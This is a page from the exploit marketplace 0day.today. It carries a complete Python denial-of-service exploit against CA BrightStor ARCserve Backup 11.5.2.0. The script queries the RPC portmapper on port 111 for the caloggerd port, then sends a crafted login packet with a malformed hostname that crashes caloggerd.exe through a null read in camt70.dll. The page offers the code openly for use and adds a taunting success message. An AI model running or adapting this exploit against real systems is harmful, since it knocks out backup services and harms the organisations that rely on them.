0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit
============================================== CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit ====================================================================== #!/usr/bin/python # # Computer Associates (CA) Brightstor Backup caloggderd.exe DoS (camt70.dll) # (Previously Unknown) # # There is an issue in camt70.dll when caloggerd is processing a hostname for a login operation. # When processing the string, if a null is passed in as an argument, it will be loaded into ESI # and then loaded into EDI in which the string processing will read a null memory location. # # .text:0032ADD0 push ecx # .text:0032ADD1 mov eax, [esp+4+arg_4] # .text:0032ADD5 push esi # .text:0032ADD6 mov esi, [esp+8+arg_8] <--null gets loaded # .text:0032ADDA push edi # .text:0032ADDB mov edx, [eax] # .text:0032ADDD mov edi, esi <-- EDI gets set to nulls # .text:0032ADDF or ecx, 0FFFFFFFFh # .text:0032ADE2 xor eax, eax # .text:0032ADE4 repne scasb # # This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest # CA patches on Windows XP SP2 # # CA has been notified # # Author: M. Shirk # # (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com # # Use at your own Risk: You have been warned #------------------------------------------------------------------------ import os import sys import time import socket import struct #------------------------------------------------------------------------ # RPC GetPort request for caloggerd rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x82\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00" # Begining of RPC Packet packet="\x80\x00\x00\x58\x31\x46\xD3\xB9\x00\x00\x00\x00\x00\x00\x00\x02" # Prog ID (caloggerd) packet+="\x00\x06\x09\x82" # Operation number 1 packet+="\x00\x00\x00\x01\x00\x00\x00\x01" # Nulls packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # Size of hostname, used in the Login packet+="\x00\x00\x00\x22" # Hostname, which apparently with the size and the nulls, causes the DoS packet+="\x41\x41\x41\x41"*8 packet+="\x41\x41\x00\x00" packet+="\xff\xff\xff\xff" #------------------------------------------------------------------------ def GetCALoggerPort(target): sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((target,111)) sock.send(rpc_portmap_req) rec = sock.recv(256) sock.close() port1 = rec[-4] port2 = rec[-3] port3 = rec[-2] port4 = rec[-1] port1 = hex(ord(port1)) port2 = hex(ord(port2)) port3 = hex(ord(port3)) port4 = hex(ord(port4)) port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16)) port = int(port,16) print '[+] Sending TCP Packet of Death to Target: %s Port: %s' % (target,port) ExploitCALoggerd(target,port) def ExploitCALoggerd(target,port): sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((target,port)) sock.send(packet) sock.close() print '[+] Done...\n[+] caloggerd.exe is dead\n[+] ... or it will die in a few seconds for you inpatient bastards\n' if __name__=="__main__": try: target = sys.argv[1] except IndexError: print '[+] Computer Associates (CA) Brightstor Backup caloggerd.exe DoS (camt70.dll)' print '[+] Author: Shirkdog' print '[+] Usage: %s <target ip>\n' % sys.argv[0] sys.exit(-1) print '[+] Computer Associates (CA) Brightstor Backup caloggerd.exe DoS (camt70.dll)' print '[+] Author: Shirkdog' GetCALoggerPort(target) # 0day.today [2024-12-24] #